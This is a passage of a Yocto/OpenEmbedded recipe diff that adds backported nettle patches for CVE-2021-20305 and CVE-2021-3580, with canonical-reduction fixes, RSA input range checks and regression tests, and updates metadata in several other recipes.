++		   "16c755d4a736bb2032c92553"),
++	      "706a46dc76dcb76798e60e6d89474788"
++	      "d16dc18032d268fd1a704fa6", /* r */
++	      "3a41e1423b1853e8aa89747b1f987364"
++	      "44705d6d6d8371ea1f578f2e"); /* s */
++
+   /* Test cases for the smaller groups, verified with a
+      proof-of-concept implementation done for Yubico AB. */
+   test_ecdsa (&_nettle_secp_192r1,
+Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c
++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c
+@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++  /* Corresponds to nonce k = 2 and private key z =
++     0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and
++     hash are chosen so that intermediate scalars in the verify
++     equations are u1 = 0x6b245680e700, u2 =
++     259da6542d4ba7d21ad916c3bd57f811. These values require canonical
++     reduction of the scalars. Bug caused by missing canonical
++     reduction reported by Guido Vranken. */
++  test_ecdsa (&_nettle_secp_224r1,
++	      "9e7e6cc6b1bdfa8ee039b66ad85e5490"
++	      "7be706a900a3cba1c8fdd014", /* x */
++	      "74855db3f7c1b4097ae095745fc915e3"
++	      "8a79d2a1de28f282eafb22ba", /* y */
++
++	      SHEX("cdb887ac805a3b42e22d224c85482053"
++		   "16c755d4a736bb2032c92553"),
++	      "706a46dc76dcb76798e60e6d89474788"
++	      "d16dc18032d268fd1a704fa6", /* r */
++	      "3a41e1423b1853e8aa89747b1f987364"
++	      "44705d6d6d8371ea1f578f2e"); /* s */
++
+   /* From RFC 4754 */
+   test_ecdsa (&_nettle_secp_256r1,
+ 	      "2442A5CC 0ECD015F A3CA31DC 8E2BBC70"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
new file mode 100644
index 0000000000..54b4fa584c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
@@ -0,0 +1,48 @@
+Backport of:
+
+From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:27:50 +0100
+Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced.
+
+* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+canonical range.
+
+(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch
+CVE: CVE-2021-20305 dep4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog        | 3 +++
+ ecc-ecdsa-sign.c | 3 +--
+ 2 files changed, 4 insertions(+), 2 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 63848f53..fb2d7f66 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13  Niels Möller  <nisse@lysator.liu.se>
+# 
+#+	* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+#+	canonical range.
+#+
+# 	* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+# 	to compute the scalars used for ecc multiplication.
+# 	* testsuite/ecdsa-verify-test.c (test_main): Add test case that
+--- a/ecc-ecdsa-sign.c
++++ b/ecc-ecdsa-sign.c
+@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve *
+ 
+   ecc_modq_mul (ecc, tp, zp, rp);
+   ecc_modq_add (ecc, hp, hp, tp);
+-  ecc_modq_mul (ecc, tp, hp, kinv);
++  ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp);
+ 
+-  mpn_copyi (sp, tp, ecc->p.size);
+ #undef P
+ #undef hp
+ #undef kinv
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
new file mode 100644
index 0000000000..468ff66266
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:42:21 +0100
+Subject: [PATCH] Similar fix for eddsa.
+
+* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+reduced. Two of the three call sites need that.
+
+(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288)
+
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch
+CVE: CVE-2021-20305 
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog    |  3 +++
+ eddsa-hash.c | 10 +++++++---
+ 2 files changed, 10 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5f8a22c2..ce330831 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13  Niels Möller  <nisse@lysator.liu.se>
+# 
+#+	* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+#+	reduced. Two of the three call sites need that.
+#+
+# 	* ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical
+# 	to compute the scalars used for ecc multiplication.
+# 
+Index: nettle-3.5.1/eddsa-hash.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-hash.c
++++ nettle-3.5.1/eddsa-hash.c
+@@ -46,7 +46,12 @@ void
+ _eddsa_hash (const struct ecc_modulo *m,
+ 	     mp_limb_t *rp, const uint8_t *digest)
+ {
++  mp_limb_t cy;
+   size_t nbytes = 1 + m->bit_size / 8;
+   mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes);
+   m->mod (m, rp);
++  mpn_copyi (rp + m->size, rp, m->size);
++  /* Ensure canonical reduction. */
++  cy = mpn_sub_n (rp, rp + m->size, m->m, m->size);
++  cnd_copy (cy, rp, rp + m->size, m->size);
+ }
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
new file mode 100644
index 0000000000..ac3a638e72
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
@@ -0,0 +1,277 @@
+From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:31:39 +0200
+Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size.
+
+Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug.
+
+(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog                    | 17 +++++++++-
+ rsa-decrypt-tr.c             |  7 ++---
+ rsa-internal.h               |  4 +--
+ rsa-sec-decrypt.c            |  9 ++++--
+ rsa-sign-tr.c                | 61 +++++++++++++++++-------------------
+ testsuite/rsa-encrypt-test.c | 14 ++++++++-
+ 6 files changed, 69 insertions(+), 43 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k
+   mp_size_t key_limb_size;
+   int res;
+ 
+-  key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++  key_limb_size = mpz_size(pub->n);
+ 
+   TMP_GMP_ALLOC (m, key_limb_size);
+   TMP_GMP_ALLOC (em, key->size);
++  mpz_limbs_copy(m, gibberish, key_limb_size);
+ 
+-  res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+-				  mpz_limbs_read(gibberish),
+-				  mpz_size(gibberish));
++  res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+ 
+   mpn_get_base256 (em, key->size, m, key_limb_size);
+ 
+Index: nettle-3.5.1/rsa-internal.h
+===================================================================
+--- nettle-3.5.1.orig/rsa-internal.h
++++ nettle-3.5.1/rsa-internal.h
+@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p
+                       mp_limb_t *scratch);
+ 
+ /* Safe side-channel silent variant, using RSA blinding, and checking the
+- * result after CRT. */
++ * result after CRT. In-place calls, with x == m, is allowed. */
+ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ 			 const struct rsa_private_key *key,
+ 			 void *random_ctx, nettle_random_func *random,
+-			 mp_limb_t *x, const mp_limb_t *m, size_t mn);
++			 mp_limb_t *x, const mp_limb_t *m);
+ 
+ #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_
+   TMP_GMP_ALLOC (m, mpz_size(pub->n));
+   TMP_GMP_ALLOC (em, key->size);
+ 
+-  res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+-				  mpz_limbs_read(gibberish),
+-				  mpz_size(gibberish));
++  /* We need a copy because m can be shorter than key_size,
++   * but _rsa_sec_compute_root_tr expect all inputs to be
++   * normalized to a key_size long buffer length */
++  mpz_limbs_copy(m, gibberish, mpz_size(pub->n));
++
++  res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+ 
+   mpn_get_base256 (em, key->size, m, mpz_size(pub->n));
+ 
+Index: nettle-3.5.1/rsa-sign-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sign-tr.c
++++ nettle-3.5.1/rsa-sign-tr.c
+@@ -131,35 +131,34 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ 			 const struct rsa_private_key *key,
+ 			 void *random_ctx, nettle_random_func *random,
+-			 mp_limb_t *x, const mp_limb_t *m, size_t mn)
++			 mp_limb_t *x, const mp_limb_t *m)
+ {
++  mp_size_t nn;
+   mpz_t mz;
+   mpz_t xz;
+   int res;
+ 
+-  mpz_init(mz);
+   mpz_init(xz);
+ 
+-  mpn_copyi(mpz_limbs_write(mz, mn), m, mn);
+-  mpz_limbs_finish(mz, mn);
++  nn = mpz_size (pub->n);
+ 
+-  res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz);
++  res = rsa_compute_root_tr(pub, key, random_ctx, random, xz,
++			    mpz_roinit_n(mz, m, nn));
+ 
+   if (res)
+-    mpz_limbs_copy(x, xz, mpz_size(pub->n));
++    mpz_limbs_copy(x, xz, nn);
+ 
+-  mpz_clear(mz);
+   mpz_clear(xz);
+   return res;
+ }
+ #else
+ /* Blinds m, by computing c = m r^e (mod n), for a random r. Also
+-   returns the inverse (ri), for use by rsa_unblind. */
++   returns the inverse (ri), for use by rsa_unblind. Must have c != m,
++   no in-place operation.*/
+ static void
+ rsa_sec_blind (const struct rsa_public_key *pub,
+                void *random_ctx, nettle_random_func *random,
+-               mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m,
+-               mp_size_t mn)
++               mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m)
+ {
+   const mp_limb_t *ep = mpz_limbs_read (pub->e);
+   const mp_limb_t *np = mpz_limbs_read (pub->n);
+@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k
+ 
+   /* c = m*(r^e) mod n */
+   itch = mpn_sec_powm_itch(nn, ebn, nn);
+-  i2 = mpn_sec_mul_itch(nn, mn);
++  i2 = mpn_sec_mul_itch(nn, nn);
+   itch = MAX(itch, i2);
+-  i2 = mpn_sec_div_r_itch(nn + mn, nn);
++  i2 = mpn_sec_div_r_itch(2*nn, nn);
+   itch = MAX(itch, i2);
+   i2 = mpn_sec_invert_itch(nn);
+   itch = MAX(itch, i2);
+ 
+-  TMP_GMP_ALLOC (tp, nn + mn + itch);
+-  scratch = tp + nn + mn;
++  TMP_GMP_ALLOC (tp, 2*nn  + itch);
++  scratch = tp + 2*nn;
+ 
+   /* ri = r^(-1) */
+   do
+@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k
+   while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch));
+ 
+   mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch);
+-  /* normally mn == nn, but m can be smaller in some cases */
+-  mpn_sec_mul (tp, c, nn, m, mn, scratch);
+-  mpn_sec_div_r (tp, nn + mn, np, nn, scratch);
++  mpn_sec_mul (tp, c, nn, m, nn, scratch);
++  mpn_sec_div_r (tp, 2*nn, np, nn, scratch);
+   mpn_copyi(c, tp, nn);
+ 
+   TMP_GMP_FREE (r);
+@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k
+   TMP_GMP_FREE (tp);
+ }
+ 
+-/* m = c ri mod n */
++/* m = c ri mod n. Allows x == c. */
+ static void
+ rsa_sec_unblind (const struct rsa_public_key *pub,
+                  mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c)
+@@ -299,7 +297,7 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ 			 const struct rsa_private_key *key,
+ 			 void *random_ctx, nettle_random_func *random,
+-			 mp_limb_t *x, const mp_limb_t *m, size_t mn)
++			 mp_limb_t *x, const mp_limb_t *m)
+ {
+   TMP_GMP_DECL (c, mp_limb_t);
+   TMP_GMP_DECL (ri, mp_limb_t);
+@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs
+   size_t key_limb_size;
+   int ret;
+ 
+-  key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++  key_limb_size = mpz_size(pub->n);
+ 
+   /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the
+      key is invalid and rejected by rsa_private_key_prepare. However,
+@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs
+     }
+ 
+   assert(mpz_size(pub->n) == key_limb_size);
+-  assert(mn <= key_limb_size);
+ 
+   TMP_GMP_ALLOC (c, key_limb_size);
+   TMP_GMP_ALLOC (ri, key_limb_size);
+   TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key));
+ 
+-  rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn);
++  rsa_sec_blind (pub, random_ctx, random, c, ri, m);
+ 
+-  _rsa_sec_compute_root(key, c, x, scratch);
++  _rsa_sec_compute_root(key, x, c, scratch);
+ 
+-  ret = rsa_sec_check_root(pub, c, x);
++  ret = rsa_sec_check_root(pub, x, c);
+ 
+-  rsa_sec_unblind(pub, x, ri, c);
++  rsa_sec_unblind(pub, x, ri, x);
+ 
+   cnd_mpn_zero(1 - ret, x, key_limb_size);
+ 
+@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub
+ 		    mpz_t x, const mpz_t m)
+ {
+   TMP_GMP_DECL (l, mp_limb_t);
++  mp_size_t nn = mpz_size(pub->n);
+   int res;
+ 
+-  mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
+-  TMP_GMP_ALLOC (l, l_size);
++  TMP_GMP_ALLOC (l, nn);
++  mpz_limbs_copy(l, m, nn);
+ 
+-  res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l,
+-				  mpz_limbs_read(m), mpz_size(m));
++  res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l);
+   if (res) {
+-    mp_limb_t *xp = mpz_limbs_write (x, l_size);
+-    mpn_copyi (xp, l, l_size);
+-    mpz_limbs_finish (x, l_size);
++    mp_limb_t *xp = mpz_limbs_write (x, nn);
++    mpn_copyi (xp, l, nn);
++    mpz_limbs_finish (x, nn);
+   }
+ 
+   TMP_GMP_FREE (l);
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,6 +19,7 @@ test_main(void)
+   uint8_t after;
+ 
+   mpz_t gibberish;
++  mpz_t zero;
+ 
+   rsa_private_key_init(&key);
+   rsa_public_key_init(&pub);
+@@ -101,6 +102,17 @@ test_main(void)
+   ASSERT(decrypted[decrypted_length] == after);
+   ASSERT(decrypted[0] == 'A');
+ 
++  /* Test zero input. */
++  mpz_init_set_ui (zero, 0);
++  decrypted_length = msg_length;
++  ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++  ASSERT(!rsa_decrypt_tr(&pub, &key,
++			 &lfib, (nettle_random_func *) knuth_lfib_random,
++			 &decrypted_length, decrypted, zero));
++  ASSERT(!rsa_sec_decrypt(&pub, &key,
++			  &lfib, (nettle_random_func *) knuth_lfib_random,
++			  decrypted_length, decrypted, zero));
++  ASSERT(decrypted_length == msg_length);
+ 
+   /* Test invalid key. */
+   mpz_add_ui (key.q, key.q, 2);
+@@ -112,6 +124,6 @@ test_main(void)
+   rsa_private_key_clear(&key);
+   rsa_public_key_clear(&pub);
+   mpz_clear(gibberish);
++  mpz_clear(zero);
+   free(decrypted);
+ }
+-  
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
new file mode 100644
index 0000000000..18e952ddf7
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
@@ -0,0 +1,163 @@
+From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:32:38 +0200
+Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions.
+
+(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog                    | 10 +++++++++-
+ rsa-decrypt-tr.c             |  4 ++++
+ rsa-decrypt.c                | 10 ++++++++++
+ rsa-sec-decrypt.c            |  4 ++++
+ rsa.h                        |  5 +++--
+ testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------
+ 6 files changed, 62 insertions(+), 9 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k
+   mp_size_t key_limb_size;
+   int res;
+ 
++  /* First check that input is in range. */
++  if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++    return 0;
++
+   key_limb_size = mpz_size(pub->n);
+ 
+   TMP_GMP_ALLOC (m, key_limb_size);
+Index: nettle-3.5.1/rsa-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt.c
++++ nettle-3.5.1/rsa-decrypt.c
+@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key
+   int res;
+ 
+   mpz_init(m);
++
++  /* First check that input is in range. Since we don't have the
++     public key available here, we need to reconstruct n. */
++  mpz_mul (m, key->p, key->q);
++  if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0)
++    {
++      mpz_clear (m);
++      return 0;
++    }
++
+   rsa_compute_root(key, m, gibberish);
+ 
+   res = pkcs1_decrypt (key->size, m, length, message);
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_
+   TMP_GMP_DECL (em, uint8_t);
+   int res;
+ 
++  /* First check that input is in range. */
++  if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++    return 0;
++
+   TMP_GMP_ALLOC (m, mpz_size(pub->n));
+   TMP_GMP_ALLOC (em, key->size);
+ 
+Index: nettle-3.5.1/rsa.h
+===================================================================
+--- nettle-3.5.1.orig/rsa.h
++++ nettle-3.5.1/rsa.h
+@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_
+ 	        size_t length, uint8_t *message,
+ 	        const mpz_t gibberish);
+ 
+-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */
++/* Compute x, the e:th root of m. Calling it with x == m is allowed.
++   It is required that 0 <= m < n. */
+ void
+ rsa_compute_root(const struct rsa_private_key *key,
+ 		 mpz_t x, const mpz_t m);
+ 
+ /* Safer variant, using RSA blinding, and checking the result after
+-   CRT. */
++   CRT. It is required that 0 <= m < n. */
+ int
+ rsa_compute_root_tr(const struct rsa_public_key *pub,
+ 		    const struct rsa_private_key *key,
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,11 +19,12 @@ test_main(void)
+   uint8_t after;
+ 
+   mpz_t gibberish;
+-  mpz_t zero;
++  mpz_t bad_input;
+ 
+   rsa_private_key_init(&key);
+   rsa_public_key_init(&pub);
+   mpz_init(gibberish);
++  mpz_init(bad_input);
+ 
+   knuth_lfib_init(&lfib, 17);
+   
+@@ -103,15 +104,40 @@ test_main(void)
+   ASSERT(decrypted[0] == 'A');
+ 
+   /* Test zero input. */
+-  mpz_init_set_ui (zero, 0);
++  mpz_set_ui (bad_input, 0);
+   decrypted_length = msg_length;
+-  ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++  ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
+   ASSERT(!rsa_decrypt_tr(&pub, &key,
+ 			 &lfib, (nettle_random_func *) knuth_lfib_random,
+-			 &decrypted_length, decrypted, zero));
++			 &decrypted_length, decrypted, bad_input));
+   ASSERT(!rsa_sec_decrypt(&pub, &key,
+ 			  &lfib, (nettle_random_func *) knuth_lfib_random,
+-			  decrypted_length, decrypted, zero));
++			  decrypted_length, decrypted, bad_input));
++  ASSERT(decrypted_length == msg_length);
++
++  /* Test input that is slightly larger than n */
++  mpz_add(bad_input, gibberish, pub.n);
++  decrypted_length = msg_length;
++  ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++  ASSERT(!rsa_decrypt_tr(&pub, &key,
++			 &lfib, (nettle_random_func *) knuth_lfib_random,
++			 &decrypted_length, decrypted, bad_input));
++  ASSERT(!rsa_sec_decrypt(&pub, &key,
++			  &lfib, (nettle_random_func *) knuth_lfib_random,
++			  decrypted_length, decrypted, bad_input));
++  ASSERT(decrypted_length == msg_length);
++
++  /* Test input that is considerably larger than n */
++  mpz_mul_2exp (bad_input, pub.n, 100);
++  mpz_add (bad_input, bad_input, gibberish);
++  decrypted_length = msg_length;
++  ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++  ASSERT(!rsa_decrypt_tr(&pub, &key,
++			 &lfib, (nettle_random_func *) knuth_lfib_random,
++			 &decrypted_length, decrypted, bad_input));
++  ASSERT(!rsa_sec_decrypt(&pub, &key,
++			  &lfib, (nettle_random_func *) knuth_lfib_random,
++			  decrypted_length, decrypted, bad_input));
+   ASSERT(decrypted_length == msg_length);
+ 
+   /* Test invalid key. */
+@@ -124,6 +150,6 @@ test_main(void)
+   rsa_private_key_clear(&key);
+   rsa_public_key_clear(&pub);
+   mpz_clear(gibberish);
+-  mpz_clear(zero);
++  mpz_clear(bad_input);
+   free(decrypted);
+ }
diff --git a/meta/recipes-support/nettle/nettle_3.5.1.bb b/meta/recipes-support/nettle/nettle_3.5.1.bb
index d92db0ef95..192fd295e9 100644
--- a/meta/recipes-support/nettle/nettle_3.5.1.bb
+++ b/meta/recipes-support/nettle/nettle_3.5.1.bb
@@ -1,5 +1,9 @@
 SUMMARY = "A low level cryptographic library"
+DESCRIPTION = "Nettle is a cryptographic library that is designed to fit easily in more or less any context: In crypto toolkits for object-oriented languages (C++, Python, Pike, ...), in applications like LSH or GNUPG, or even in kernel space."
 HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/"
+DESCRIPTION = "It tries to solve a problem of providing a common set of \
+cryptographic algorithms for higher-level applications by implementing a \
+context-independent set of cryptographic algorithms"
 SECTION = "libs"
 LICENSE = "LGPLv3+ | GPLv2+"
 
@@ -14,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \
            file://Add-target-to-only-build-tests-not-run-them.patch \
            file://run-ptest \
            file://check-header-files-of-openssl-only-if-enable_.patch \
+           file://CVE-2021-3580_1.patch \
+           file://CVE-2021-3580_2.patch \
+           file://CVE-2021-20305-1.patch \
+           file://CVE-2021-20305-2.patch \
+           file://CVE-2021-20305-3.patch \
+           file://CVE-2021-20305-4.patch \
+           file://CVE-2021-20305-5.patch \
            "
 
 SRC_URI_append_class-target = "\
diff --git a/meta/recipes-support/npth/npth_1.6.bb b/meta/recipes-support/npth/npth_1.6.bb
index 88484acec3..94a3f00eac 100644
--- a/meta/recipes-support/npth/npth_1.6.bb
+++ b/meta/recipes-support/npth/npth_1.6.bb
@@ -1,4 +1,5 @@
 SUMMARY = "New GNU Portable Threads library"
+DESCRIPTION = "nPth is a library to provide the GNU Pth API and thus a non-preemptive threads implementation. "
 HOMEPAGE = "https://www.gnu.org/software/pth/"
 SECTION = "libs"
 LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
index 4ba93f998a..5f1b73ee16 100644
--- a/meta/recipes-support/p11-kit/p11-kit_0.23.20.bb
+++ b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
@@ -1,18 +1,21 @@
 SUMMARY = "Provides a way to load and enumerate PKCS#11 modules"
+DESCRIPTION = " Provides a standard configuration setup for installing PKCS#11 modules in such a way that they're discoverable. Also solves problems with coordinating the use of PKCS#11 by different components or libraries living in the same process."
+HOMEPAGE = "https://p11-glue.github.io/p11-glue/p11-kit.html"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50"
 
-inherit meson gettext pkgconfig gtk-doc bash-completion
+inherit meson gettext pkgconfig gtk-doc bash-completion manpages
 
 DEPENDS = "libtasn1 libtasn1-native libffi"
 
 DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}"
 
-SRC_URI = "git://github.com/p11-glue/p11-kit"
-SRCREV = "762cdaa2cd5c5ec09cc844f9a6bdc551c7f6c8ed"
+SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https"
+SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee"
 S = "${WORKDIR}/git"
 
 PACKAGECONFIG ??= ""
+PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native"
 PACKAGECONFIG[trust-paths] = "-Dtrust_paths=/etc/ssl/certs/ca-certificates.crt,,,ca-certificates"
 
 GTKDOC_MESON_OPTION = 'gtk_doc'
diff --git a/meta/recipes-support/popt/popt_1.16.bb b/meta/recipes-support/popt/popt_1.16.bb
index 27e49c2ca2..0c0392d036 100644
--- a/meta/recipes-support/popt/popt_1.16.bb
+++ b/meta/recipes-support/popt/popt_1.16.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Library for parsing command line options"
+DESCRIPTION = "Popt is a C library for parsing command line parameters. Popt was heavily influenced by the getopt() and getopt_long() functions, but it improves on them by allowing more powerful argument expansion. Popt can parse arbitrary argv[] style arrays and automatically set variables based on command line arguments."
 HOMEPAGE = "http://rpm5.org/"
 SECTION = "libs"
 
diff --git a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
index 8b9938f572..3401b7b39e 100644
--- a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
+++ b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe"
 SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd"
 PV .= "+git${SRCPV}"
 
-SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \
+SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \
 "
 UPSTREAM_VERSION_UNKNOWN = "1"
 
@@ -27,3 +27,5 @@ do_compile () {
 do_install () {
 	install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner
 }
+
+RDEPENDS_${PN}_append_libc-glibc = " libgcc"
